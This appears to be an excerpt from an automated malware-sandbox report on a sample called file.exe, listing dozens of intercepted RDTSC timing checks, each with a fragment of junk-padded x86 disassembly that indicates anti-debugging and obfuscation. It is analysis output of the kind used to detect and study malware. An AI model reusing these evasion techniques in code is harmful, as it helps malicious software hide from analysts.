              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25160 second address: B251AD instructions: 0x00000000 rdtsc 0x00000002 ja 00007FABF0F31B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007FABF0F31B56h 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 push ebx 0x00000019 push esi 0x0000001a pop esi 0x0000001b pop ebx 0x0000001c pushad 0x0000001d push edi 0x0000001e pop edi 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 popad 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 pushad 0x00000028 jnl 00007FABF0F31B4Ch 0x0000002e je 00007FABF0F31B4Ch 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B264D3 second address: B264E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABF0D685FDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B264E4 second address: B264FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0F31B53h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CAF0 second address: B2CAF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CF08 second address: B2CF22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FABF0F31B46h 0x0000000a jmp 00007FABF0F31B50h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2D36B second address: B2D371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2D371 second address: B2D37B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FABF0F31B46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2D37B second address: B2D381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2D381 second address: B2D386 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B31B81 second address: B31B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B31E3F second address: B31E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B31E48 second address: B31E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B31E4C second address: B31E88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0F31B58h 0x00000007 jmp 00007FABF0F31B56h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007FABF0F31B46h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B31E88 second address: B31E8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B315FD second address: B3161E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop esi 0x0000000f popad 0x00000010 pushad 0x00000011 jp 00007FABF0F31B4Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B325AB second address: B325B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FABF0D685F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34142 second address: B34146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34146 second address: B34155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FABF0D685F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34155 second address: B34162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jc 00007FABF0F31B46h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34162 second address: B34168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3989D second address: B398AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAC50D second address: AAC513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAC513 second address: AAC517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAC517 second address: AAC526 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FABF0D685F6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3861B second address: B3863F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FABF0F31B51h 0x0000000c jmp 00007FABF0F31B4Ch 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3863F second address: B3864F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0D685FCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3864F second address: B38658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B38BB5 second address: B38BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABF0D685FFh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B38BC9 second address: B38BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABF0F31B54h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1D30 second address: AE1D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABF0D68605h 0x00000009 pop ecx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1D4A second address: AE1D50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1D50 second address: AE1D6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FABF0D685F8h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B39759 second address: B3976F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABF0F31B52h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B380E8 second address: B380FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABF0D685FEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B380FF second address: B38103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4D3E second address: AB4D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4D44 second address: AB4D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FABF0F31B46h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02F19 second address: B02F1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02F1D second address: B02F3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0F31B59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02F3A second address: AE1229 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0D68608h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c cmc 0x0000000d call dword ptr [ebp+122D339Dh] 0x00000013 pushad 0x00000014 push esi 0x00000015 pushad 0x00000016 popad 0x00000017 pop esi 0x00000018 push esi 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B03044 second address: B03049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B034BF second address: B034D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0D685FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B034D1 second address: B034D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B034D5 second address: B034F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 3D842E65h 0x0000000e or ecx, dword ptr [ebp+122D2A30h] 0x00000014 call 00007FABF0D685F9h 0x00000019 pushad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B034F6 second address: B0350D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 js 00007FABF0F31B4Ch 0x0000000b jbe 00007FABF0F31B46h 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0350D second address: B0353D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007FABF0D68605h 0x0000000b jmp 00007FABF0D685FFh 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 push edi 0x00000017 jmp 00007FABF0D685FBh 0x0000001c pop edi 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0353D second address: B03543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B038CE second address: B038D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B038D4 second address: B038F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FABF0F31B4Ch 0x0000000b popad 0x0000000c push eax 0x0000000d jc 00007FABF0F31B4Eh 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B03A18 second address: B03A26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FABF0D685F6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B03A26 second address: B03A2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B03A2A second address: B03A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FABF0D685F8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000004h 0x00000024 je 00007FABF0D685FCh 0x0000002a mov dword ptr [ebp+1247E1BFh], edx 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FABF0D68606h 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B03A7C second address: B03A80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B03A80 second address: B03A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B041F4 second address: AE1D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABF0F31B52h 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FABF0F31B48h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D1879h], eax 0x0000002b lea eax, dword ptr [ebp+12486C46h] 0x00000031 sub ecx, 25EFE05Ah 0x00000037 nop 0x00000038 jmp 00007FABF0F31B54h 0x0000003d push eax 0x0000003e push esi 0x0000003f push ebx 0x00000040 pushad 0x00000041 popad 0x00000042 pop ebx 0x00000043 pop esi 0x00000044 nop 0x00000045 mov ecx, dword ptr [ebp+1245A7BEh] 0x0000004b call dword ptr [ebp+122D2C57h] 0x00000051 push eax 0x00000052 push edx 0x00000053 push ecx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41B93 second address: B41B9F instructions: 0x00000000 rdtsc 0x00000002 je 00007FABF0D685F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41B9F second address: B41BA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41D20 second address: B41D2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FABF0D685F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41D2C second address: B41D3C instructions: 0x00000000 rdtsc 0x00000002 je 00007FABF0F31B52h 0x00000008 jg 00007FABF0F31B46h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B42280 second address: B42284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B42284 second address: B4228A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4228A second address: B422AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0D68605h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FABF0D685FAh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B42409 second address: B4240F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4240F second address: B42413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B42413 second address: B42437 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0F31B59h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B42437 second address: B42446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 js 00007FABF0D685F6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B42446 second address: B42450 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FABF0F31B46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B42450 second address: B42464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FABF0D685F6h 0x0000000e jp 00007FABF0D685F6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B42464 second address: B42468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45D45 second address: B45D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABF0D68603h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FABF0D68605h 0x00000011 jmp 00007FABF0D685FCh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45D80 second address: B45D8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FABF0F31B46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAFAC1 second address: AAFAEF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jl 00007FABF0D685F6h 0x00000010 jno 00007FABF0D685F6h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 je 00007FABF0D68609h 0x0000001f jmp 00007FABF0D685FDh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B48715 second address: B48719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B48719 second address: B48727 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FABF0D685F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B48727 second address: B48754 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0F31B55h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FABF0F31B4Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B489AA second address: B489F0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jo 00007FABF0D685F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FABF0D68607h 0x00000012 jg 00007FABF0D685F6h 0x00000018 popad 0x00000019 pushad 0x0000001a jmp 00007FABF0D68608h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AF23 second address: B4AF3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007FABF0F31B46h 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AF3A second address: B4AF40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AF40 second address: B4AF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FABF0F31B46h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B519E4 second address: B519EE instructions: 0x00000000 rdtsc 0x00000002 je 00007FABF0D68602h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B519EE second address: B51A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FABF0F31B46h 0x0000000a pushad 0x0000000b jmp 00007FABF0F31B55h 0x00000010 jp 00007FABF0F31B46h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B503CC second address: B503D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B503D0 second address: B503F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FABF0F31B52h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B503F3 second address: B503F9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B503F9 second address: B50416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABF0F31B53h 0x00000009 jne 00007FABF0F31B46h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B50696 second address: B5069A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5069A second address: B506AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FABF0F31B46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jg 00007FABF0F31B46h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B506AF second address: B506BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B50811 second address: B50815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B50815 second address: B50830 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0D68601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B50830 second address: B5083E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FABF0F31B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5083E second address: B50842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
